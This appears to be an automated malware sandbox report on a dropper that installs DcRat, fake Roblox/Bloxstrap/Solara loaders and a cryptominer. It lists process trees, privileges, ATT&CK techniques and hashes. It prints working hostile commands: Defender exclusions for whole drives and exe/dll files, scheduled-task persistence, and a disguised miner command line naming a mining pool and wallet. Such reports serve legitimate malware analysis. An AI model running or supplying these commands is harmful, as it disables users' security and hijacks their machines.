Token: SeIncreaseQuotaPrivilege	1376	powershell.exe
Token: SeSecurityPrivilege	1376	powershell.exe
Token: SeTakeOwnershipPrivilege	1376	powershell.exe
Token: SeLoadDriverPrivilege	1376	powershell.exe
Token: SeSystemProfilePrivilege	1376	powershell.exe
Token: SeSystemtimePrivilege	1376	powershell.exe
Token: SeProfSingleProcessPrivilege	1376	powershell.exe
Token: SeIncreaseQuotaPrivilege	1404	powershell.exe
Token: SeIncBasePriorityPrivilege	1376	powershell.exe
Token: SeSecurityPrivilege	1404	powershell.exe
Token: SeCreatePagefilePrivilege	1376	powershell.exe
Token: SeTakeOwnershipPrivilege	1404	powershell.exe
Token: SeBackupPrivilege	1376	powershell.exe
Token: SeLoadDriverPrivilege	1404	powershell.exe
Token: SeRestorePrivilege	1376	powershell.exe
Token: SeSystemProfilePrivilege	1404	powershell.exe
Token: SeShutdownPrivilege	1376	powershell.exe
Token: SeSystemtimePrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeProfSingleProcessPrivilege	1404	powershell.exe
Token: SeSystemEnvironmentPrivilege	1376	powershell.exe
Token: SeIncBasePriorityPrivilege	1404	powershell.exe
Token: SeRemoteShutdownPrivilege	1376	powershell.exe
Token: SeCreatePagefilePrivilege	1404	powershell.exe
Token: SeUndockPrivilege	1376	powershell.exe
Token: SeBackupPrivilege	1404	powershell.exe
Token: SeManageVolumePrivilege	1376	powershell.exe
Token: SeRestorePrivilege	1404	powershell.exe
Token: 33	1376	powershell.exe
Token: SeShutdownPrivilege	1404	powershell.exe
Token: 34	1376	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: 35	1376	powershell.exe
Token: SeSystemEnvironmentPrivilege	1404	powershell.exe
Token: 36	1376	powershell.exe
Token: SeRemoteShutdownPrivilege	1404	powershell.exe
Token: SeUndockPrivilege	1404	powershell.exe
Token: SeManageVolumePrivilege	1404	powershell.exe
Token: 33	1404	powershell.exe
Token: 34	1404	powershell.exe
Token: 35	1404	powershell.exe
Token: 36	1404	powershell.exe
Token: SeIncreaseQuotaPrivilege	4780	powershell.exe
Token: SeSecurityPrivilege	4780	powershell.exe
Token: SeTakeOwnershipPrivilege	4780	powershell.exe
Token: SeLoadDriverPrivilege	4780	powershell.exe
Token: SeSystemProfilePrivilege	4780	powershell.exe
Token: SeSystemtimePrivilege	4780	powershell.exe
Token: SeProfSingleProcessPrivilege	4780	powershell.exe
Token: SeIncBasePriorityPrivilege	4780	powershell.exe
Token: SeCreatePagefilePrivilege	4780	powershell.exe
Token: SeBackupPrivilege	4780	powershell.exe
Token: SeRestorePrivilege	4780	powershell.exe
Token: SeShutdownPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeSystemEnvironmentPrivilege	4780	powershell.exe
Token: SeRemoteShutdownPrivilege	4780	powershell.exe
Token: SeUndockPrivilege	4780	powershell.exe
Token: SeManageVolumePrivilege	4780	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3608 wrote to memory of 208	3608	Youtube.exe	74
PID 3608 wrote to memory of 208	3608	Youtube.exe	74
PID 3608 wrote to memory of 208	3608	Youtube.exe	74
PID 3608 wrote to memory of 3276	3608	Youtube.exe	75
PID 3608 wrote to memory of 3276	3608	Youtube.exe	75
PID 3608 wrote to memory of 3276	3608	Youtube.exe	75
PID 208 wrote to memory of 2164	208	Result.exe	77
PID 208 wrote to memory of 2164	208	Result.exe	77
PID 208 wrote to memory of 2164	208	Result.exe	77
PID 3608 wrote to memory of 3636	3608	Youtube.exe	76
PID 3608 wrote to memory of 3636	3608	Youtube.exe	76
PID 3608 wrote to memory of 1452	3608	Youtube.exe	79
PID 3608 wrote to memory of 1452	3608	Youtube.exe	79
PID 3608 wrote to memory of 1452	3608	Youtube.exe	79
PID 208 wrote to memory of 1504	208	Result.exe	80
PID 208 wrote to memory of 1504	208	Result.exe	80
PID 208 wrote to memory of 1504	208	Result.exe	80
PID 3276 wrote to memory of 2888	3276	DCRatBuild.exe	81
PID 3276 wrote to memory of 2888	3276	DCRatBuild.exe	81
PID 3276 wrote to memory of 2888	3276	DCRatBuild.exe	81
PID 1504 wrote to memory of 3932	1504	solara.exe	82
PID 1504 wrote to memory of 3932	1504	solara.exe	82
PID 1504 wrote to memory of 3932	1504	solara.exe	82
PID 1452 wrote to memory of 4516	1452	Frage build.exe	83
PID 1452 wrote to memory of 4516	1452	Frage build.exe	83
PID 1452 wrote to memory of 4516	1452	Frage build.exe	83
PID 3932 wrote to memory of 3460	3932	WScript.exe	84
PID 3932 wrote to memory of 3460	3932	WScript.exe	84
PID 3932 wrote to memory of 3460	3932	WScript.exe	84
PID 3460 wrote to memory of 4364	3460	cmd.exe	86
PID 3460 wrote to memory of 4364	3460	cmd.exe	86
PID 4364 wrote to memory of 1376	4364	Refcrt.exe	94
PID 4364 wrote to memory of 1376	4364	Refcrt.exe	94
PID 4364 wrote to memory of 4780	4364	Refcrt.exe	95
PID 4364 wrote to memory of 4780	4364	Refcrt.exe	95
PID 4364 wrote to memory of 1404	4364	Refcrt.exe	96
PID 4364 wrote to memory of 1404	4364	Refcrt.exe	96
PID 4364 wrote to memory of 2536	4364	Refcrt.exe	100
PID 4364 wrote to memory of 2536	4364	Refcrt.exe	100
PID 2536 wrote to memory of 1412	2536	cmd.exe	102
PID 2536 wrote to memory of 1412	2536	cmd.exe	102
PID 2536 wrote to memory of 4492	2536	cmd.exe	104
PID 2536 wrote to memory of 4492	2536	cmd.exe	104
PID 2164 wrote to memory of 3116	2164	SolaraBootstrapper.exe	105
PID 2164 wrote to memory of 3116	2164	SolaraBootstrapper.exe	105
PID 2164 wrote to memory of 3116	2164	SolaraBootstrapper.exe	105
PID 2720 wrote to memory of 3632	2720	msiexec.exe	108
PID 2720 wrote to memory of 3632	2720	msiexec.exe	108
PID 2720 wrote to memory of 332	2720	msiexec.exe	109
PID 2720 wrote to memory of 332	2720	msiexec.exe	109
PID 2720 wrote to memory of 332	2720	msiexec.exe	109
PID 3636 wrote to memory of 1752	3636	Bloxstrap.exe	110
PID 3636 wrote to memory of 1752	3636	Bloxstrap.exe	110
PID 3636 wrote to memory of 1752	3636	Bloxstrap.exe	110
PID 1752 wrote to memory of 4620	1752	conhost.exe	111
PID 1752 wrote to memory of 4620	1752	conhost.exe	111
PID 4620 wrote to memory of 4292	4620	cmd.exe	113
PID 4620 wrote to memory of 4292	4620	cmd.exe	113
PID 1752 wrote to memory of 4352	1752	conhost.exe	114
PID 1752 wrote to memory of 4352	1752	conhost.exe	114
PID 4352 wrote to memory of 3176	4352	cmd.exe	116
PID 4352 wrote to memory of 3176	4352	cmd.exe	116
PID 4620 wrote to memory of 2960	4620	cmd.exe	117
PID 4620 wrote to memory of 2960	4620	cmd.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Youtube.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3608
- C:\Users\Admin\AppData\Local\Temp\Result.exe
  "C:\Users\Admin\AppData\Local\Temp\Result.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\SysWOW64\msiexec.exe
      "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
      4⤵
      PID:3116
  - - C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
      "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
      4⤵
      PID:5864
- - C:\Users\Admin\AppData\Local\Temp\solara.exe
    "C:\Users\Admin\AppData\Local\Temp\solara.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3932
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3460
      - C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
        
        "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wscript.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Xwyb0BsBsO.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2536
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:1412
        
        C:\Recovery\WindowsRE\Idle.exe
        
        "C:\Recovery\WindowsRE\Idle.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4492
- C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
  2⤵
  - DcRat
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
    3⤵
    PID:2888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
      4⤵
      PID:3308
    - - C:\winNet\ComContainerbrowserRefRuntime.exe
        
        "C:\winNet/ComContainerbrowserRefRuntime.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4104
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aYbtlPbWys.bat"
        6⤵
        
        PID:3636
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:732
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4416
        
        C:\winNet\ComContainerbrowserRefRuntime.exe
        
        "C:\winNet\ComContainerbrowserRefRuntime.exe"
        7⤵
        Executes dropped EXE
        
        PID:5264
- C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2960
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
        5⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:3176
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      PID:5156
    - - C:\Users\Admin\Bloxstrap.exe
        
        C:\Users\Admin\Bloxstrap.exe
        5⤵
        Executes dropped EXE
        
        PID:1156
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:5676
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:6020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6028
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:4824
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
        7⤵
        
        PID:5640
- C:\Users\Admin\AppData\Local\Temp\Frage build.exe
  "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
    3⤵
    PID:4516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
      4⤵
      PID:2144
    - - C:\DriversavessessionDlldhcp\Roblox.exe
        
        "C:\DriversavessessionDlldhcp/Roblox.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        
        PID:1544
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ifan5oep\ifan5oep.cmdline"
        6⤵
        
        PID:1800
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC043.tmp" "c:\Recovery\WindowsRE\CSC42E995E45B2042749426CEEDA718629E.TMP"
        7⤵
        
        PID:400
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0zbr30k\w0zbr30k.cmdline"
        6⤵
        
        PID:4728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0EE.tmp" "c:\Recovery\WindowsRE\CSC4287EC725E2842ED811227C74EFE9033.TMP"
        7⤵
        
        PID:32
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ex2tloj3\ex2tloj3.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:3660
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1E8.tmp" "c:\Windows\System32\CSC87E29C5A11BC4BEE91B03EA91E794C1.TMP"
        7⤵
        
        PID:64
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4508
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4552
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1612
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:468
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2668
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:620
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:732
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4568
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xN9u0ph4AK.bat"
        6⤵
        
        PID:2272
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5340
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:5740
        
        C:\DriversavessessionDlldhcp\Roblox.exe
        
        "C:\DriversavessessionDlldhcp\Roblox.exe"
        7⤵
        Executes dropped EXE
        
        PID:5244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:708

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding DE9A9DC9C02DAEF6653435EF889E1776
  2⤵
  - Loads dropped DLL
  PID:3632
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0096FD8EBFB024FACEED5AF38BED5775
  2⤵
  - Loads dropped DLL
  PID:332
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E5128F924259DD57D56489330EF0E74D E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Modifies data under HKEY_USERS
  PID:4764
- - C:\Windows\syswow64\wevtutil.exe
    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
    3⤵
    PID:5848
  - - C:\Windows\System32\wevtutil.exe
      "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
      4⤵
      PID:6096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 13 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5797bf.rbs

Filesize
1.0MB

MD5
86d9c389f85c477651e62961ec059e32

SHA1
0262663e0395e06b6ea8e9475096178448a748ad

SHA256
d3e3b2453696f8352c5f64d2509f1ec7faa4c742468346e62b8d6911059f3016

SHA512
aa21400bd7d932fa2640ea3532e908e72ed4c5467e4a254a207a0354ba20da40f9ef72d587b5b93e1e60e18a52e54a258ed461377d4649acd516d5106fefe57e

Download Submit
C:\DriversavessessionDlldhcp\Roblox.exe

Filesize
1.8MB

MD5
26e388ea32df635cd424decb2bff563e

SHA1
